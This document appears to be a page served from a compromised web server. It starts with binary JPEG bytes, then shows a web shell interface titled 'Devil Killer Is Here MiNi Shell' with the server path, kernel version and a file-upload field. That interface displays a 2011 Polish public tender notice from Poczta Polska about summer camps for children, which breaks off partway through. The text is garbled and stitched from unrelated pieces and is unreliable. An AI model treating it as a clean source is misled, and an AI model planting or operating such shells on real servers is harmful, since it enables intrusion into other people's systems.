JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/118229-N-2011.html

<p class="kh_header"><b>Kraków: Zorganizowanie wypoczynku letniego dla dzieci i młodzieży (Przemyśl, Krosno)</b><br>
<b>Numer ogłoszenia: 118229 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie , ul. Bronowicka 44, 30-093 Kraków, woj. małopolskie, tel. 12 6190516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wypoczynku letniego dla dzieci i młodzieży (Przemyśl, Krosno).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) CZĘŚĆ NR 1 - zorganizowanie kolonii dla dzieci w wieku 8-14 lat nad Morzem Bałtyckim (jednostka zlecająca: Dział Zarządzania Kadrami w Przemyślu)
Turnus: 15 dniowy tj. 13 noclegów. Termin (w okresie pomiędzy): 09.07.2011 r. - 12.08.2011 r. - jeden turnus;
Ilość uczestników: przewidywana ilość uczestników 40 osób;
Zamawiający zastrzega sobie możliwość rezygnacji z ilości wykupionych skierowań do 20%  w terminie do 14 dni przed rozpoczęciem turnusu;

2) CZĘŚĆ NR 2 - zorganizowanie zagranicznego obozu młodzieżowego dla dzieci w wieku 14-19 lat na Krym (jednostka zlecająca: Dział Zarządzania Kadrami w Przemyślu)
Turnus: 12 dniowy tj. 9 noclegów. Termin (w okresie pomiędzy): 10.07.2011 r. - 31.07.2011 r. (II, III dekada lipca)- jeden turnus;
Ilość uczestników: przewidywana ilość uczestników 50 osób;
Zamawiający zastrzega sobie możliwość rezygnacji z ilości wykupionych skierowań do 20%  w terminie do 14 dni przed rozpoczęciem turnusu;

3) CZĘŚĆ NR 3 - zorganizowanie kolonii dla dzieci w wieku 8-15 lat nad Morzem Bałtyckim (jednostka zlecająca: Dział Zarządzania Kadrami w Krośnie)
Turnus: 14 dniowy tj. 13 noclegów. Termin (w okresie pomiędzy): 01.07.2011 r. - 15.08.2011 r. - jeden turnus;
Ilość uczestników: przewidywana ilość uczestników: 57 osób;
Zamawiający zastrzega sobie możliwość rezygnacji z ilości wykupionych skierowań do 20%  w terminie do 14 dni przed rozpoczęciem turnusu;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium na okres związania ofertą, w zależności od zadania, o udzielenie którego Wykonawca ubiega się na kwotę/wartość: 
1) w przypadku ubiegania się o udzielenie zamówienia na część nr 1: 1.000,00 zł (słownie jeden tysiąc złotych 00/100);
2) w przypadku ubiegania się o udzielenie zamówienia na część nr 2: 2.000,00 zł (słownie dwa tysiące złotych 00/100);
3) w przypadku ubiegania się o udzielenie zamówienia na zadanie nr 3: 1.500,00 zł (słownie jeden tysiąc pięćset złotych 00/100);
UWAGA: W przypadku ubiegania się o udzielenie zamówienia na więcej niż jedno zadanie, kwota/wartość wymaganego wadium podlega sumowaniu do wysokości wymaganego wadium, dla tych części zamówienia, o udzielenie których Wykonawca się ubiega. 
W przypadku ubiegania się o udzielenie zamówienia na wszystkie zadania - Wykonawca winien wnieść wadium na kwotę/wartość: 4.500,00 zł (słownie cztery tysiące pięćset złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia okaże aktualnym wpisem do Centralnej Ewidencji Organizatorów Turystyki i Pośredników Turystycznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia wykaże się należytym zrealizowaniem, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia wg następujących zasad:
1) w przypadku ubiegania się o udzielenie zamówienia tylko na część nr 1: Wykonawca powinien wykazać się należytym zrealizowaniem co najmniej 2 usług polegających na zorganizowaniu kolonii, obozów lub innego wypoczynku dla dzieci każda na wartość nie mniejszą niż 40.000,00 zł brutto;
2) w przypadku ubiegania się o udzielenie zamówienia tylko na część nr 2: Wykonawca powinien wykazać się należytym zrealizowaniem co najmniej 2 usług polegających na zorganizowaniu kolonii, obozów lub innego wypoczynku dla dzieci każda na wartość nie mniejszą niż 80.000,00 zł brutto;
3) w przypadku ubiegania się o udzielenie zamówienia tylko na część nr 3: Wykonawca powinien wykazać się należytym zrealizowaniem co najmniej 2 usług polegających na zorganizowaniu kolonii, obozów lub innego wypoczynku dla dzieci każda na wartość nie mniejszą niż 60.000,00 zł brutto;
UWAGA: W przypadku ubiegania się o udzielenie zamówienia na więcej niż jedną część zamówienia warunek musi zostać spełniony łącznie - Wykonawca winien wykazać się należytym zrealizowaniem co najmniej 2 usług na wartość nie mniejszą niż suma wymaganych wartości usług dla tych części zamówienia, o udzielenie których Wykonawca się ubiega. 
W przypadku ubiegania się o udzielenie zamówienia na wszystkie części (część nr 1, 2 i 3): Wykonawca powinien wykazać się należytym zrealizowaniem co najmniej 2 usług polegających na zorganizowaniu kolonii, obozów lub innego wypoczynku dla dzieci, każda na wartość nie mniejszą niż 180.000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu w powyższym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca ubiegający się o udzielenie przedmiotowego zamówienia potwierdzi spełnienie wymogów, o których mowa w art. 5 ust. 1 pkt 2 ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz.U. z 2004 r., nr 223, poz. 2268 z późn. zm.), tj. potwierdzi, że posiada zawartą i obowiązującą:
1) umowę gwarancji bankowej lub ubezpieczeniowej albo
2) umowę ubezpieczenia na rzecz klientów
- w zakresie pokrycia kosztów powrotu klienta do kraju, w wypadku gdy organizator turystyki lub pośrednik turystyczny wbrew obowiązkowi nie zapewnia tego powrotu, a także na pokrycie zwrotu wpłat wniesionych przez klientów w razie niewykonania zobowiązań umownych Dokumenty wyżej określone powinny spełniać uwarunkowania określone w:
a) Rozporządzeniu Ministra Finansów z dnia 16 grudnia 2010 r. w sprawie minimalnej wysokości sumy gwarancji bankowej lub ubezpieczeniowej wymaganej w związku z działalnością wykonywaną przez organizatorów turystyki i pośredników turystycznych (Dz.U. z 2010 r., nr 238, poz. 1584) albo
b) Rozporządzeniu Ministra Finansów z dnia 21 grudnia 2010 r. w sprawie obowiązkowego ubezpieczenia na rzecz klientów w związku z działalnością wykonywaną przez organizatorów turystyki i pośredników turystycznych (Dz.U. z 2010 r., nr 252, poz. 1690)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty jakie powinni dostarczyć wykonawcy w celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez zamawiającego
1) Wykonawca zobligowany zostaje do przedłożenia wraz z ofertą szczegółowego opisu miejscowości, w której znajduje się proponowany obiekt, jego otoczenie i położenie, wyposażenie, wielkość i wyposażenie pokoi, sanitariatów, stołówki, świetlicy - własna czy wynajmowana w innym obiekcie (odległość), zaplecze sportowo-rekreacyjne (boiska do siatkówki, koszykówki, piłki nożnej, korty tenisowe) - własne czy wynajmowane w innym ośrodku (odległość) oraz zaopatrzenie w sprzęt sportowy. Mile widziana prezentacja fotograficzna. Przedmiotowy opis (odrębnie dla każdej części zamówienia) należy bezwzględnie dołączyć do oferty;
2) Wykonawca opisze również program autorski w zakresie organizacji imprez sportowo-rekreacyjno-turystycznych, kulturalno-oświatowych, który dołączy do oferty. (UWAGA: W ofercie Wykonawca opisze program dydaktyczno - wychowawczy, w którym należy uwzględnić m. in. Profil wypoczynku (kolonii/obozu), ilość i tematykę organizowanych wycieczek autokarowych, pieszych, imprez rekreacyjno-sportowo-turystycznych, program na niepogodę i inne);
3) Informacje określone w pkt 1 i 2 stanowić będą podstawę do indywidualnej oceny oferty przez członków Komisji, w jednym z kryterium przedmiotowych.
4) Wykonawca przedłoży również, w zależności od części zamówienia, o udzielenie której ubiega się załącznik(i) nr 1A i/lub 1B i/lub1C stanowiące formularze, na podstawie których dokonana zostanie ocena ofert w innym kryterium przedmiotowym</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Warunki socjalno-bytowe - 30</li>
<li>3 - Zakres programu - 20</li>
<li>4 - Atrakcyjność profilu kolonii - indywidualna ocena członków Komisji - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.poczta-polska.pl/O_Firmie/?d=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych
ul. Asnyka 9 pok. 318C
35-959 Rzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 10:30, miejsce: POCZTA POLSKA S.A. CENTRUM INFRASTRUKTURY Oddział Regionalny w Krakowie, Dział Zamówień Publicznych, 35-959 Rzeszów, ul. Asnyka 9, III piętro, pok. nr 318C.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zorganizowanie kolonii dla dzieci w wieku 8-14 lat nad Morzem Bałtyckim (jednostka zlecająca: Dział Zarządzania Kadrami w Przemyślu).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka części nr 1 zamówienia - wymagania:
a) Miejscowość: nadmorska nad morzem Bałtyckim (oprócz takich miejscowości jak: Niechorze, Darłówek, Stegna, Dąbki, Chłapów - wymienione miejscowości leżą poza kręgiem zainteresowania Zamawiającego, ze względu na organizację w ostatnim okresie w tych miejscowościach wypoczynku dla dzieci dla jednostki zlecającej DZK w Przemyślu);
b) Turnus: 15 dniowy tj. 13 noclegów. Termin (w okresie pomiędzy): 09.07.2011 r. - 12.08.2011 r. - jeden turnus;
c) Warunki socjalno-bytowe: Wykonawca opisze miejscowość, w której znajduje się proponowany obiekt, jego otoczenie i położenie, wyposażenie, wielkość i wyposażenie pokoi, sanitariaty, stołówka, świetlica własna czy wynajmowana w innym obiekcie (odległość), zaplecze sportowo-rekreacyjne (boiska do siatkówki, koszykówki, piłki nożnej, korty tenisowe) własne czy wynajmowane w innym ośrodku (odległość) oraz zaopatrzenie w sprzęt sportowy. Mile widziana prezentacja fotograficzna. Przedmiotowy opis wykonawca dołączy do oferty; 
d) Wyżywienie: 4 posiłki dziennie: śniadanie, obiad, podwieczorek, kolacja plus dodatkowe wyżywienie w formie szwedzkiego stołu po godz. 20:00 wg zapotrzebowania uczestników kolonii, na drogę powrotną suchy prowiant (2 bułki z masłem i serem żółtym, drożdżówka, jabłko, batonik, woda mineralna 0,5 l). Woda do picia dostępna na obiekcie wypoczynku przez cały okres trwania kolonii. Stawka żywieniowa dzienna na jednego uczestnika powinna wynosić nie mniej niż 40,00 złotych a wsad do kotła - nie mniej niż 20,00 zł. Pierwszy posiłek uzależniony od godziny przyjazdu do ośrodka wypoczynku;
e) Transport: wymagany jest dowóz uczestników kolonii na miejsce wypoczynku i z powrotem autokarem klasy Lux (klimatyzacja, wc, bar, video);
f) Program dydaktyczno-wychowawczy: Wykonawca opisze program autorski w zakresie organizacji imprez sportowo-rekreacyjno-turystycznych, kulturalno-oświatowych, który dołączy do oferty. (UWAGA: W ofercie Wykonawca opisze program dydaktyczno - wychowawczy, w którym należy uwzględnić m. in. profil kolonii, ilość i tematykę organizowanych wycieczek autokarowych, pieszych, imprez rekreacyjno-sportowo-turystycznych, program na niepogodę i inne);
g) Ubezpieczenie: NNW;
h) Kadra:  wychowawczo-pedagogiczna, medyczna, ratownik;
i) Inne:  opłaty klimatyczne, drogowe, parkingowe;
j) Ilość uczestników: przewidywana ilość uczestników 40 osób;
k) Dodatkowe wymagania i zastrzeżenia:
- Zamawiający zastrzega sobie możliwość rezygnacji z ilości wykupionych skierowań do 20%  w terminie do 14 dni przed rozpoczęciem turnusu;
- W terminie do 7 dni przed rozpoczęciem turnusu należy dostarczyć Zamawiającemu kserokopie potwierdzenia złożenia wniosku o wydanie zezwolenia przez właściwy oddział Kuratorium Oświaty, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 roku w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz.U. z1997r., nr 12, poz.67);
- Cena organizowanych wycieczek oraz imprez musi obejmować wszystkie koszty ich realizacji. W cenę należy wliczyć wszystkie bilety wstępu, koszty przewodnika i inne; 
- W zakresie dodatkowego wyżywienie szwedzkiego stołu - wykonawca powinien zabezpieczyć uczestnikom wypoczynku dodatkowe wyżywienie w godz. 20:00-21:30 poprzez udostępnienie im produktów np.: pieczywo, dżem, miód, serki topione, twarożek opakowany hermetycznie, wędlina opakowana hermetycznie, ser żółty opakowany hermetycznie, krem np. nutella, jogurt. Dopuszcza się możliwość przygotowania przedmiotowego posiłku bezpośrednio przez wychowawców grup. Nie wymaga się aby przedmiotowy posiłek był podany na stołówce - dopuszcza się możliwość przygotowania posiłku np. na świetlicy z zastrzeżeniem zachowania zasad higieny.
- Ponadto Wykonawca zabezpiecza: wykwalifikowaną kadrę wychowawczą, pełną opiekę medyczną przy czym wszelkie koszty związane z zapewnieniem należytej opieki medycznej łącznie z kosztami leków podstawowej opieki medycznej (nie dotyczy leków przyjmowanych przez dziecko stale) obciążają organizatora kolonii, zabezpieczenie opieki ratownika w czasie kąpieli..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Warunki socjalno-bytowe - 30</li>
<li>3. Zakres programu - 20</li>
<li>4. Atrakcyjność profilu kolonii - indywidualna ocena członków Komisji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zorganizowanie zagranicznego obozu młodzieżowego dla dzieci w wieku 14-19 lat na Krym (jednostka zlecająca: Dział Zarządzania Kadrami w Przemyślu).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka części nr 2 zamówienia - wymagania:
a) Miejscowość: południowo-zachodnie wybrzeże Krymu, okolice Sewastopola);
b) Turnus: 12 dniowy tj. 9 noclegów. Termin (w okresie pomiędzy): 10.07.2011 r. - 31.07.2011 r. (II, III dekada lipca)- jeden turnus;
c) Warunki socjalno-bytowe: Wykonawca opisze miejscowość, w której znajduje się proponowany obiekt, jego otoczenie i położenie, wyposażenie, wielkość i wyposażenie pokoi, sanitariaty, restauracja własna czy wynajmowana w innym obiekcie (odległość), zaplecze sportowo-rekreacyjne (basen) własne czy wynajmowane w innym ośrodku (odległość) oraz zaopatrzenie w sprzęt sportowy. Mile widziana prezentacja fotograficzna Przedmiotowy opis wykonawca dołączy do oferty; 
d) Wyżywienie: 3 posiłki dziennie: śniadanie, obiad, kolacja - kuchnia lokalna, na drogę powrotną suchy prowiant (2 x przygotowane bułki lub kanapki, 1x owoc - jabłko lub  brzoskwinia, 1x woda mineralna 1,5l). Woda do picia dostępna na obiekcie wypoczynku przez cały okres trwania obozu. Pierwszy posiłek uzależniony od godziny przyjazdu do ośrodka wypoczynku;
e) Transport: wymagany jest dowóz uczestników obozu na miejsce wypoczynku i z powrotem autokarem klasy Lux (klimatyzacja, wc, bar, video);
f) Program dydaktyczno-wychowawczy: Wykonawca opisze program autorski w zakresie organizacji imprez sportowo-rekreacyjno-turystycznych, kulturalno-oświatowych, który dołączy do oferty. (UWAGA: W ofercie Wykonawca opisze program dydaktyczno - wychowawczy, w którym należy uwzględnić m. in. profil obozu, ilość i tematykę organizowanych wycieczek /w tym także wycieczek fakultatywnych wraz z cenami/ imprez rekreacyjno-sportowo-turystycznych, program na niepogodę i inne);
g) Ubezpieczenie: KL, NNW + bagaż;
h) Kadra:  wychowawczo-pedagogiczna, medyczna, ratownik;
i) Inne:  opłaty klimatyczne, drogowe, parkingowe;
j) Ilość uczestników: przewidywana ilość uczestników 50 osób;
k) Dodatkowe wymagania i zastrzeżenia:
